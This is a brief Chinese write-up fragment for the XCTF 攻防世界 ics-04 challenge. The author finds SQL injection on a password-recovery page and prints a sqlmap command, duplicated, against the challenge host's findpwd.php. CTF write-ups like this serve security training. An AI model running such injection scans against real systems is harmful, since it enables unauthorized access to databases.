[wp] 攻防世界 ics-04

尝试注册登录帐号 扫了下目录没发现什么,用sqlmap把每一个页面跑过去,发如今找回密码页面有注入php sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1"
相关文章
相关标签/搜索